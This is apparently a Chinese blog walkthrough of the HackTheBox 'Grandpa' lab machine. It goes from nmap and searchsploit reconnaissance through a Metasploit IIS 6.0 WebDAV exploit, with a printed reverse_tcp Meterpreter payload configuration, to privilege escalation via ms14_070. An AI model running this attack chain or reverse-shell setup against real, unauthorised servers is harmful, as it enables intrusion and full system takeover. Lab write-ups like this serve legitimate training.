Hackthebox::grandpa walkthrough

  • Grandpa是hackthebox上一台难度为简单的windows靶机

信息收集

  • 首先使用nmap扫描一下端口情况

image-20211227230552901

  • 然后使用nmap扫描一下是否存在漏洞

image-20211227230757330

  • 通过两次nmap的扫描,我们得知靶机开放了80端口,并且存在漏洞
  • 使用searchsploit扫描Microsoft IIS httpd 6.0服务,看看是否有可以被利用的漏洞

image-20211227231051633

  • 我们发现了许多可以使用的脚本,再次使用msf查看是否可以利用‘

image-20211227231247078

  • 我们发现了可以利用的部分,我们使用第二个
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.129.166.10    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86
  • 我们成功进入了,但是很可惜我们的权限不足

image-20211227231707825

  • 我们将迁移进程,并且寻找合适的漏洞利用脚本来入侵
  • 迁移进程

image-20211227231911796

  • 使用suggester查看可以利用漏洞的脚本

image-20211227232427257

  • 我们发现了以下可以使用的方式,我们选择exploit/windows/local/ms14_070_tcpip_ioctl

image-20211227233022025

  • 完成设置

image-20211227233230168

  • 好的,我们成功了,获得了最高权限

image-20211227233425946

  • 查看flag

image-20211227233646152

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值